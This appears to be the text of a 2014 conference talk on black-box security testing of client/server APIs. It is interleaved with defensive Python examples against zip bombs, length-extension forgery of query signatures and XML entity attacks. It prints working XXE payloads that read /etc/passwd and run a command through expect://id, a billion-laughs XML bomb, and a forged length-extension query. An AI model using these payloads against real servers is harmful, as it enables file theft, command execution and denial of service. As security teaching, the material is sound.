CodeFest 2014. S. Belov: BlackBox security testing of a client/server API
Pentesting client/server API
Sergey Belov

$ whoami
© 2002—2014, Digital Security
• Senior Security Auditor at Digital Security
• BugHunter: Google, Yandex, Badoo, Yahoo +++
• Writer: habrahabr, "Xakep" magazine
• CTF: DEFCON 2012 CTF Final, Chaos Construction CTF'2013
• Speaker: CodeFest 2012, ZeroNights 0x03
• Trainer: Hack in Paris'2014, BlackHat'2014 USA (soon)

What are we talking about?
API

Hacking via API
From interface to API methods

What should we test?
• Logic!
• Bypassing restrictions (sqli/xss)
• Parameter tampering
Developing:
• Stop hacks and custom implementations in the API! Really

ZIP
42 kb…
…10 GB?
…100 GB?
…100 TB?
…4,5 PB! http://www.unforgettable.dk/
Say HELLO to ZIP BOMB!
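The zip-bomb slides above describe an archive of a few tens of kilobytes whose declared contents run to petabytes once inflated. The following Python is an added example, not code from the deck or from Digital Security; it shows the two checks an API that accepts archives should make: inspect the central directory (compression ratio, declared total, nested archives) before touching any data, and cap the bytes actually produced while inflating, because the sizes in the headers can be forged. The thresholds, function names and the sample archive are this example's own assumptions.

```python
import io
import zipfile

# Constructed thresholds for this example; tune them per API and per upload type.
MAX_RATIO = 100                      # declared uncompressed bytes / compressed bytes
MAX_TOTAL_BYTES = 50 * 1024 * 1024   # sum of declared member sizes
MAX_ENTRIES = 1000


def inspect_zip(data: bytes) -> list[str]:
    """Return reasons to reject the archive; an empty list means the headers look sane.

    Only the central directory is read here; nothing is decompressed yet, so this
    is cheap enough to run on every upload."""
    problems = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
        if len(infos) > MAX_ENTRIES:
            problems.append(f"too many entries: {len(infos)}")
        declared_total = 0
        for info in infos:
            declared_total += info.file_size
            if info.compress_size and info.file_size / info.compress_size > MAX_RATIO:
                problems.append(
                    f"{info.filename}: ratio {info.file_size // info.compress_size}:1"
                )
            if info.filename.lower().endswith(".zip"):
                # 42.zip-style bombs hide their size one nesting level at a time.
                problems.append(f"{info.filename}: nested archive")
        if declared_total > MAX_TOTAL_BYTES:
            problems.append(f"declared total {declared_total} bytes exceeds limit")
    return problems


def read_member_capped(data: bytes, name: str, max_bytes: int) -> bytes:
    """Inflate one member while counting the bytes it really produces.

    Header sizes are attacker-controlled, so this in-flight cap is the check that
    holds even when inspect_zip() was lied to. Raises ValueError past the cap."""
    out = bytearray()
    with zipfile.ZipFile(io.BytesIO(data)) as zf, zf.open(name) as fh:
        while True:
            chunk = fh.read(64 * 1024)
            if not chunk:
                break
            out += chunk
            if len(out) > max_bytes:
                raise ValueError(f"{name}: exceeded {max_bytes} bytes while decompressing")
    return bytes(out)


def make_highly_compressible_zip(name: str, size: int) -> bytes:
    """Constructed sample input: one member of `size` zero bytes.

    Deflate squeezes a run of zeros roughly 1000:1, which is enough to trip
    MAX_RATIO without building a real multi-layer bomb."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, b"\x00" * size)
    return buf.getvalue()


if __name__ == "__main__":
    sample = make_highly_compressible_zip("big.bin", 8 * 1024 * 1024)
    print(f"archive is {len(sample)} bytes on the wire")
    print("rejection reasons:", inspect_zip(sample))
    try:
        read_member_capped(sample, "big.bin", 1024 * 1024)
    except ValueError as exc:
        print("capped:", exc)
```

The header inspection is a fast first filter, but a nested bomb only reveals its next layer after the outer one is inflated, so the byte cap in `read_member_capped` is the control that actually bounds resource use; the same streaming cap applies to any other decompression the API performs (gzip request bodies, image formats) and is the reason the slides ask you to re-test "specific compressions".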
Evil of javascript and
http://habrahabr.ru/post/186160/
Crypto

Query signing
Sign = sha*(…+DATA+…)
api key

But why?

Say hello again. To the length extension attack

A=1&B=2&C=3
07ce36c769ae130708258fb5dfa3d37ca5a67514
TOKEN = sha1(KEY + DATA)

Someone has hijacked just one request…

What does the attacker know?
• Original data
• Sign (token)

What does the attacker want?
Change some data / change params

A=1&B=2&C=3\x80\x00\x00…\x02&C=4

Can sign a new query without the api key!
Vkontakte: sig = md5(name1=value1name2=value2api_secret)
Mail.RU: sig = md5(uid + params + private_key)
http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack

Request hijacking… How?
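The signing slides show why TOKEN = sha1(KEY + DATA) lets a holder of one signed request mint another: the token is SHA-1's internal state after KEY+DATA+padding, so appended bytes can be hashed on top of it without the key, and the forged query carries padding bytes and a second C= parameter. The Python below is an added example, not code from the deck or from any of the services named on the slides; it places the weak prefix-hash scheme beside an HMAC replacement and adds a strict, canonicalising verifier that also rejects the artefacts such a forgery leaves behind. The secret value, function names and parameter rules are this example's own assumptions.

```python
import hashlib
import hmac
from urllib.parse import parse_qsl

# Constructed demo secret; a real deployment keeps this server-side only.
API_SECRET = b"demo-secret-not-real"


def sign_prefix_sha1(secret: bytes, data: bytes) -> str:
    """The scheme from the slides: TOKEN = sha1(KEY + DATA).

    SHA-1 is a Merkle-Damgard construction, so this token is exactly the chaining
    state after processing KEY + DATA + padding. Anyone holding (data, token) can
    therefore keep hashing appended bytes without ever learning KEY."""
    return hashlib.sha1(secret + data).hexdigest()


def sign_hmac(secret: bytes, data: bytes) -> str:
    """Hardened form: HMAC-SHA256.

    The key enters an inner and an outer hash, so the tag is not a reusable
    internal state and length extension does not apply."""
    return hmac.new(secret, data, hashlib.sha256).hexdigest()


def canonical_params(query: str) -> bytes:
    """Parse strictly and canonicalise before anything is verified.

    Rejects duplicate names (the forged query carries C=3 ... C=4), non-printable
    bytes (the \\x80\\x00... padding), and anything that is not a plain key=value
    pair, then sorts by name so the signed form is order-independent."""
    pairs = parse_qsl(query, keep_blank_values=True, strict_parsing=True)
    seen = {}
    for name, value in pairs:
        if name in seen:
            raise ValueError(f"duplicate parameter {name!r}")
        if any(ord(ch) < 0x20 or ord(ch) > 0x7E for ch in name + value):
            raise ValueError("non-printable byte in parameters")
        seen[name] = value
    return "&".join(f"{k}={seen[k]}" for k in sorted(seen)).encode()


def verify_request(query: str, presented_sig: str, secret: bytes = API_SECRET) -> bool:
    """Server-side check: canonicalise, recompute the HMAC, compare in constant time."""
    try:
        data = canonical_params(query)
    except ValueError:
        return False
    expected = sign_hmac(secret, data)
    return hmac.compare_digest(expected, presented_sig)


if __name__ == "__main__":
    original = "A=1&B=2&C=3"
    sig = sign_hmac(API_SECRET, canonical_params(original))
    print("genuine request accepted:", verify_request(original, sig))
    forged = "A=1&B=2&C=3\x80\x00\x00\x02&C=4"   # shape of the slide's forged query
    print("forged request accepted:", verify_request(forged, sig))
```

Two points a reviewer would raise against the original scheme even before HMAC: the verifier should never hash whatever raw bytes arrive on the wire, and duplicate parameter names should be an error rather than "last one wins", since a framework that silently takes the later C=4 is precisely what turns a valid-looking tag into a parameter change.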
XML? XML entities!

DTD Example:
<!ENTITY writer "Donald Duck.">
<!ENTITY copyright "Copyright W3Schools.">
XML example:
<author>&writer;&copyright;</author>

XML entities? External Entity!

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<foo>&xxe;</foo>

XML Bombs!

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

What are we talking about?
Man in the Middle

Examples?
2013-11-19 by Reginaldo Silva
https://www.facebook.com/BugBounty/posts/778897822124446
http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution

Testing:
• https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)
• XXE to RCE https://gist.github.com/joernchen/3623896
Development:
• Disable entities
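The XML slides show three things that all depend on a DTD: ordinary internal entities, external entities pointing at file:// or expect://, and the nested "lolz" entity bomb; the development advice is simply "disable entities". The Python below is an added example, not code from the deck, showing the bluntest way to do that with the standard library: pre-scan the document with a bare expat parser that aborts at the first DOCTYPE or entity declaration, before any entity can be expanded or fetched, and only then hand the bytes to ElementTree. The handler names are real pyexpat attributes; the function names, the small three-level bomb and the plain sample document are this example's own constructions, and the XXE document is the one from the slides, used here only as rejected input.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class UnsafeXML(ValueError):
    """Raised when a document carries a DTD; this API never accepts one."""


def assert_no_dtd(data: bytes) -> None:
    """Abort at the first DOCTYPE or entity declaration.

    External entities (file://, expect://) and entity bombs both need a DTD to
    declare themselves, so refusing the DTD outright is the simplest form of
    'disable entities'. The exception raised inside the handler propagates out of
    Parse(), so the parser never reaches the entity references in the body."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE {name!r} rejected: DTDs are not accepted")

    def on_entity_decl(*args):
        raise UnsafeXML("entity declaration rejected")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(data, True)


def parse_untrusted(data: bytes) -> ET.Element:
    """Parse client-supplied XML only after the DTD check has passed."""
    assert_no_dtd(data)
    return ET.fromstring(data)


def is_acceptable(data: bytes) -> bool:
    """True when the document is well-formed and DTD-free; False otherwise."""
    try:
        parse_untrusted(data)
        return True
    except (UnsafeXML, ET.ParseError, xml.parsers.expat.ExpatError):
        return False


# Inputs: the deck's external-entity sample, a constructed 3-level entity bomb
# (3**2 expansions, enough to exercise the check without burning memory), and a
# plain document in the shape of the deck's <author> example.
XXE_SAMPLE = (b'<!DOCTYPE foo [ <!ELEMENT foo ANY > '
              b'<!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>')
SMALL_BOMB = (b'<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol">'
              b'<!ENTITY lol1 "&lol;&lol;&lol;"><!ENTITY lol2 "&lol1;&lol1;&lol1;">]>'
              b'<lolz>&lol2;</lolz>')
PLAIN = b'<author>Donald Duck</author>'


if __name__ == "__main__":
    for label, doc in (("plain", PLAIN), ("xxe", XXE_SAMPLE), ("bomb", SMALL_BOMB)):
        print(f"{label}: {'accepted' if is_acceptable(doc) else 'rejected'}")
```

Rejecting every DOCTYPE is stricter than some parsers' "no external entities" switch, and that is the point: an API that exchanges structured data has no business accepting a client-supplied DTD at all. Where a project already depends on it, the defusedxml package implements the same policy across the stdlib parsers.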
Finally:
• Re-test all interface restrictions;
• Specific compressions;
• JS callbacks;
• Crypto + SSL test + hardcoded credentials (hackapp.com);
• XML - XXE;
• Anything else :]

twitter.com/sergeybelove
sbelov@dsec.ru
Digital Security in Moscow: (495) 223-07-86
Digital Security in Saint Petersburg: (812) 703-15-47
Thanks for your attention! Questions?